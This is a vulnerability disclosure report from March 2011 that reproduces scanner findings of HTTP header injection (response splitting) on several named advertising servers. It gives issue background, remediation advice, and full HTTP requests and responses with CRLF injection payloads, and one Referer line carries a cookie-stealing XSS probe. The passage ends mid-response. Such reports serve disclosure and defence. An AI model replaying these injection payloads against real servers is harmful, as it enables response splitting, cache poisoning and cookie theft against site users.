CWE-113, HTTP Header Injection, DORK, Response Splitting, March 8, 2011 DORK Report

The DORK Report

1.1. http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.redcated/go/286222553/direct [REST URL parameter 3]

1.2. http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.redcated/go/286222553/direct [REST URL parameter 4]

1.3. http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.redcated/go/286222553/direct [REST URL parameter 5]

1.4. http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.redcated/go/286222553/direct [REST URL parameter 6]

1.5. http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.redcated/go/286222553/direct [REST URL parameter 7]

1.6. http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.redcated/go/286222553/direct [name of an arbitrarily supplied request parameter]

1.7. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

1.8. http://amch.questionmarket.com/adsc/d822109/8/850797/decide.php [ES cookie]

1.9. http://bidder.mathtag.com/notify [exch parameter]

1.10. http://d.xp1.ru4.com/activity [redirect parameter]

1. HTTP header injection
There are 10 instances of this issue:

http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct [REST URL parameter 3]
http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct [REST URL parameter 4]
http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct [REST URL parameter 5]
http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct [REST URL parameter 6]
http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct [REST URL parameter 7]
http://a.tribalfusion.com/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/dot.gif [REST URL parameter 1]
http://amch.questionmarket.com/adsc/d822109/8/850797/decide.php [ES cookie]
http://bidder.mathtag.com/notify [exch parameter]
http://d.xp1.ru4.com/activity [redirect parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload e15b1%0d%0a6f1509af8a8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/e15b1%0d%0a6f1509af8a8/clk.redcated/go/286222553/direct HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a9n6Tos2aFvDAJsgYZd7ZaVZbBnUCFRDfZcrc5CpEeyr56x4EgqZbVRiXOpevuTOTTDihDbFOHcSGJuUx0n2BYkMZcVBYZa4HqLQNJFQe0Wd56iBg07Tea4vWmwBS1EDDMqq7RuWyKHZaxuirn1jJ5Rs80ygrGMFn8ZcBxdmZd7B2WgEm2NmZayxlKa898JodZcwa3mGvcBVQaKImWR9QHCZdHFMpTb1Gscl0SXZaoIXxHKxr46Gtnr3yBbxK8cbBm1aPP4bewJ3tVZa4PYvlb2ZdW1vKt0ObBmdacnTZbMY1SVyDBZaViMN25SyxZdfMgI1Aa6NexXkaZcnsA6tZcEZd0B8QoyhwYs9RFYtouTrXaZbQgRXh3CpZaVZd;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a7n8TRwyEotDuMNybLFOgZcJQjZcZcok5ZcBgoE9eVyHSXvOA3OZdWSeOxi9Y24vEvxIy16D18M5BQMXg8CXcQfNZcRZdRxZcrpXWwtCURdh5ZcCm0BYwZdJ80QdC78h3ZdwlycCIN5Hy8ZaYlNr7KNv3pfjyvVcNYsag3yntXuShk6MuG97Mg8XRucF3qnUXV9hXmPsLuFPybn6ZauoDTBZcXjAqYGqYFI1QvF0274RVrJqSDTXdUdmLGJo1AFKZd83pZd3rweFEELvm5gGJrGJI693qD0GcKL8wtWI4x1CNfgp3hCZcL7lrVAu0E4pHdYZdSwpt6ZdDEGVNY10eR19ZciO97ZalrZccvdBeITI8DtanbYJxTFH6Ufnu1uIJq3cub6bsVAD0dnump; path=/; domain=.tribalfusion.com; expires=Mon, 06-Jun-2011 12:03:02 GMT;
Content-Type: text/html
Location: e15b1
6f1509af8a8/clk.redcated/go/286222553/direct
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 2e2af%0d%0a9fd7da0121a was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/2e2af%0d%0a9fd7da0121a/go/286222553/direct HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a9n6Tos2aFvDAJsgYZd7ZaVZbBnUCFRDfZcrc5CpEeyr56x4EgqZbVRiXOpevuTOTTDihDbFOHcSGJuUx0n2BYkMZcVBYZa4HqLQNJFQe0Wd56iBg07Tea4vWmwBS1EDDMqq7RuWyKHZaxuirn1jJ5Rs80ygrGMFn8ZcBxdmZd7B2WgEm2NmZayxlKa898JodZcwa3mGvcBVQaKImWR9QHCZdHFMpTb1Gscl0SXZaoIXxHKxr46Gtnr3yBbxK8cbBm1aPP4bewJ3tVZa4PYvlb2ZdW1vKt0ObBmdacnTZbMY1SVyDBZaViMN25SyxZdfMgI1Aa6NexXkaZcnsA6tZcEZd0B8QoyhwYs9RFYtouTrXaZbQgRXh3CpZaVZd;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aOn8TRSyZaR28T8vNQ1f29kLEQTfCwUBH8yZbBIQtddTY2isvjhte0lQely5nUQfZbgwdZayw6TVUZdR3KZc4HQyWyDNYh9VoNsepT7ri0lSKt4pMwVceZdjkAoSv434xMTsFM1DLaxZboxra9n16dfZdq54tWZbWW5dtSZcfqBsX9yicgHQoZcwgOCru6nEYLcYa21TKJJFylVRUWm9ZaMcIUUMYgf0bv02IYpWPNSmVMhwDPK8HlV8CbZdrRnT9BUe8ZbFSiH7SBNqBhpFmlJAAIyX23ER0dBpWU387yog9brUbLihcaU8ZaXverrb1MZdskZcyVlCZaWNi2Zbxl3yxSdedSGX3C6XdTBwFvfS0HmDvLORn6haYim2ywjqEJDw2iZbFnQqU7MER; path=/; domain=.tribalfusion.com; expires=Mon, 06-Jun-2011 12:03:25 GMT;
Content-Type: text/html
Location: http:/2e2af
9fd7da0121a/go/286222553/direct
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 6a056%0d%0a16481f959a8 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/6a056%0d%0a16481f959a8/286222553/direct HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a9n6Tos2aFvDAJsgYZd7ZaVZbBnUCFRDfZcrc5CpEeyr56x4EgqZbVRiXOpevuTOTTDihDbFOHcSGJuUx0n2BYkMZcVBYZa4HqLQNJFQe0Wd56iBg07Tea4vWmwBS1EDDMqq7RuWyKHZaxuirn1jJ5Rs80ygrGMFn8ZcBxdmZd7B2WgEm2NmZayxlKa898JodZcwa3mGvcBVQaKImWR9QHCZdHFMpTb1Gscl0SXZaoIXxHKxr46Gtnr3yBbxK8cbBm1aPP4bewJ3tVZa4PYvlb2ZdW1vKt0ObBmdacnTZbMY1SVyDBZaViMN25SyxZdfMgI1Aa6NexXkaZcnsA6tZcEZd0B8QoyhwYs9RFYtouTrXaZbQgRXh3CpZaVZd;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=asn8TRxZduBx8ApTwrxFjogcDB1FpRmEsxXLdqB2Tx7mZcyoM4hMaYdkZcxaUyEnaKJGTKLZcB5bJcU18ASGF2T4tF1xg5mXwfxQQyaMZcVZcmR12Mt4hu7IFSOSx2LarRKNmMhSbvnBvcaQNkvjh22x3V9o1cC0pnoRo6HZc6lZaZdkHblAKoM6UjpNcTdax7ewrLwZdB31uRearoe063ryVhhsTV2ZaVIvP1Pc9yFABXSIydH1xjnfa0prLjmBEL3Mdgc74K3eLhdQvHwqSlyZaZbmAswLm8Su0okPDCG6EZaBZbKWsZdcNvnhunnV1tDrcn0CtIBG471kH21LZdoi1xwB4rZajYpqCXnChDSZcobrstdBf9Dufq1mRZapbnZaSPLWa3xsyHrwx; path=/; domain=.tribalfusion.com; expires=Mon, 06-Jun-2011 12:03:44 GMT;
Content-Type: text/html
Location: http:/clk.redcated/6a056
16481f959a8/286222553/direct
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload bee69%0d%0a64bd7fafd08 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/bee69%0d%0a64bd7fafd08/direct HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a9n6Tos2aFvDAJsgYZd7ZaVZbBnUCFRDfZcrc5CpEeyr56x4EgqZbVRiXOpevuTOTTDihDbFOHcSGJuUx0n2BYkMZcVBYZa4HqLQNJFQe0Wd56iBg07Tea4vWmwBS1EDDMqq7RuWyKHZaxuirn1jJ5Rs80ygrGMFn8ZcBxdmZd7B2WgEm2NmZayxlKa898JodZcwa3mGvcBVQaKImWR9QHCZdHFMpTb1Gscl0SXZaoIXxHKxr46Gtnr3yBbxK8cbBm1aPP4bewJ3tVZa4PYvlb2ZdW1vKt0ObBmdacnTZbMY1SVyDBZaViMN25SyxZdfMgI1Aa6NexXkaZcnsA6tZcEZd0B8QoyhwYs9RFYtouTrXaZbQgRXh3CpZaVZd;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=apn8TRRkP6tPeCnM78EhwQbCJegmsXEFGHJPMvo7d9YMmiyNHndv1JbfawPFZbcBYoGLZc41X7Zb9TvKiSW3T441IVisTwZc45O83geXllEPpJRZbHydZdQMDSpiPiVV1UWUmhH6khUEwcP4xXBMih2T3E1OSs9ov6DSpA9XdlEbiFreDf1G8dqcxtPTjeaZaTW5NdRBWyBbXuSuYlhJtwywZbocU10wBU06VkOqj5PRrZa6tSbkS76ynjdZbPbBCZaZbbisnGLj2MFWZb9k12o9ZcayUH89Ksgex1w3OAck6tn4ZdM4Zc7S8xXXqlmstxAU0VnPtdjH89PNpZc0Zc5eh5OOAy36jIhyIX3ZdcTZdFupQPpEZbOlcYPNxQACDUSgZc6NmaQEyYHE1H; path=/; domain=.tribalfusion.com; expires=Mon, 06-Jun-2011 12:03:59 GMT;
Content-Type: text/html
Location: http:/clk.redcated/go/bee69
64bd7fafd08/direct
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 9419c%0d%0a3b509489872 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/9419c%0d%0a3b509489872 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a9n6Tos2aFvDAJsgYZd7ZaVZbBnUCFRDfZcrc5CpEeyr56x4EgqZbVRiXOpevuTOTTDihDbFOHcSGJuUx0n2BYkMZcVBYZa4HqLQNJFQe0Wd56iBg07Tea4vWmwBS1EDDMqq7RuWyKHZaxuirn1jJ5Rs80ygrGMFn8ZcBxdmZd7B2WgEm2NmZayxlKa898JodZcwa3mGvcBVQaKImWR9QHCZdHFMpTb1Gscl0SXZaoIXxHKxr46Gtnr3yBbxK8cbBm1aPP4bewJ3tVZa4PYvlb2ZdW1vKt0ObBmdacnTZbMY1SVyDBZaViMN25SyxZdfMgI1Aa6NexXkaZcnsA6tZcEZd0B8QoyhwYs9RFYtouTrXaZbQgRXh3CpZaVZd;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aAn8TRqO2cvb2OqNvhbZb4jFpMdDAcfZd7kUIQZaRrqScyuvRwe9DkO9U9uPqxGrujhheChkZaPWB3P1cPUWjL3vLZdXyKnv1GZaNBAHdvZdUGqV23JLQavMrZdnGgXyswMakunZccCBvZaRsqnAmYYPlMigVSWbqaG4mRZcAyQdZdekTfdrAPC0DJdHZbZaOHulKLPe0HKxZcnmTx7XZdwPyEZcvBpMvc9UGmONjvOpD4wTc3rWoZaPlbgVaGYr1pBqb936LOMZblqZbLbjmHGcfjIKPqjxPBPEwghPZcT1gZcRVms5hSYZaZcylbcGVNM3MQs6SJJS8KtBDfGE0MyZag6ShlO9fpBE4n2hI19LOZbIeEp6xcJpoWPR6Hvgy5qUZbHYN5smspGaCMZdMXNb; path=/; domain=.tribalfusion.com; expires=Mon, 06-Jun-2011 12:04:14 GMT;
Content-Type: text/html
Location: http:/clk.redcated/go/286222553/9419c
3b509489872
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d6786%0d%0ac1bd9c8bc9e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aDmOnIUAnTQqv3QGQmQWUy0tFpVAnM4sUXXUMIVmyu4PB8R6jA3HMt0tJKpdIN3PrR5sj9UcF6WVj8RAvnTHUSTUn12F2wVEjsTTQ7PTBZdQVBZaRFAvSdfdUVMU5U6nndenXEqp2dvZaQsZbG5AMZbmdPrUdbe0r7iYrfeXaqGgwOkdR/http:/clk.atdmt.com/go/286222553/direct?d6786%0d%0ac1bd9c8bc9e=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a9n6Tos2aFvDAJsgYZd7ZaVZbBnUCFRDfZcrc5CpEeyr56x4EgqZbVRiXOpevuTOTTDihDbFOHcSGJuUx0n2BYkMZcVBYZa4HqLQNJFQe0Wd56iBg07Tea4vWmwBS1EDDMqq7RuWyKHZaxuirn1jJ5Rs80ygrGMFn8ZcBxdmZd7B2WgEm2NmZayxlKa898JodZcwa3mGvcBVQaKImWR9QHCZdHFMpTb1Gscl0SXZaoIXxHKxr46Gtnr3yBbxK8cbBm1aPP4bewJ3tVZa4PYvlb2ZdW1vKt0ObBmdacnTZbMY1SVyDBZaViMN25SyxZdfMgI1Aa6NexXkaZcnsA6tZcEZd0B8QoyhwYs9RFYtouTrXaZbQgRXh3CpZaVZd;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aVn8TRpyXamUqiV3EG6yCxZa7ByB8GoDbO1GCEKuq5sNO2OTZbOPkKh7chXtNF72CeVIj5R3VTv4QwRbonveNllHO2cbngrbNKPZbgkXoT6O5TIM48yZbEQhnwnHH4ZbFRZdZbHZbm7E9HUx3w3mTbUEduradWBDx2D31lEXW7iQOHWKZdxiQKZcfo2aofftUoM0ws40Zdyh2IOSWLvaiTKUKKYk7gy911Nma6Zco5A4Bur7jdcB9rpQXSrpfK3ib7hOUCeQqAEZb3CytniVsQmw8eGZbuEHmRpYMkWcRTHfRcacbQ3ePsnAyy9l2gLXus8YuB2oRt7tTciOOq9FTVHQffJvNqg71dUGurf0XcHK3CgBZdpujVHMvUU37TGPZaTrbK0AaIXA; path=/; domain=.tribalfusion.com; expires=Mon, 06-Jun-2011 12:01:38 GMT;
Content-Type: text/html
Location: http:/clk.redcated/go/286222553/direct?d6786
c1bd9c8bc9e=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/dot.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b5b7%0d%0ad5c8147ec9d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif2b5b7%0d%0ad5c8147ec9d?0.04387316177599132 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.30secondmba.com/?sReferrer=1055855|59579496|236318404|09b5af%22-alert(document.cookie)-%2224e2525c92&referrer=N3016.FastCompany\
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif2b5b7
d5c8147ec9d:
Date: Mon, 07 Mar 2011 18:14:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.8. http://amch.questionmarket.com/adsc/d822109/8/850797/decide.php [ES cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d822109/8/850797/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 2d004%0d%0a42b2b1e70c1 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d822109/8/850797/decide.php?ord=1299460728 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_728_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-1_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2; ES=2d004%0d%0a42b2b1e70c1

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:46:24 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
